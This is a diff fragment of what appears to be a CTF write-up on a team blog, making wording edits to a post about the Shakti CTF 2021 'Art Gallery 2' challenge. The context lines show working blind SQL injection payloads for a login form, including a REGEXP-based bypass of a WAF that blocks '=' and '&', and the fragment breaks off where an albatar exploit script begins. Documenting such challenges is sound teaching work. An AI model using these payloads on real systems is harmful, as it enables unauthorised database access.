thegoonies/thegoonies.github.io/_posts/2021-04-04-shakti-ctf-2021-art-gallery-2.md

 * `username=test'%2b(select*from(select('a'))a)#&password=` -> "welcome!!"
 * `username=test'%2b(select*from(select('1'))a)#&password=` -> "Incorrect username or password or both??"

-But the WAF is slightly annoying and because the `=` and `&` are blacklisted, I went with the REGEXP technique:
+But the WAF is slightly annoying and because `=` and `&` are blacklisted, I went with the REGEXP technique:
 * `username=test'%2b(select*from(select(if(((select/**/'b')regexp/**/binary/**/'^b'),'a','1')))a)#` -> "welcome!!"
 * `username=test'%2b(select*from(select(if(((select/**/'a')regexp/**/binary/**/'^b'),'a','1')))a)#` -> "Incorrect username or password or both??"

-I wrote an exploit script using the [albatar](https://github.com/lanjelot/albatar) framework, which I specifically created to exploit intricate SQL injections.
+I wrote an exploit script using [albatar](https://github.com/lanjelot/albatar), a framework I specifically created to exploit intricate SQL injections.
 ```python
 from albatar import *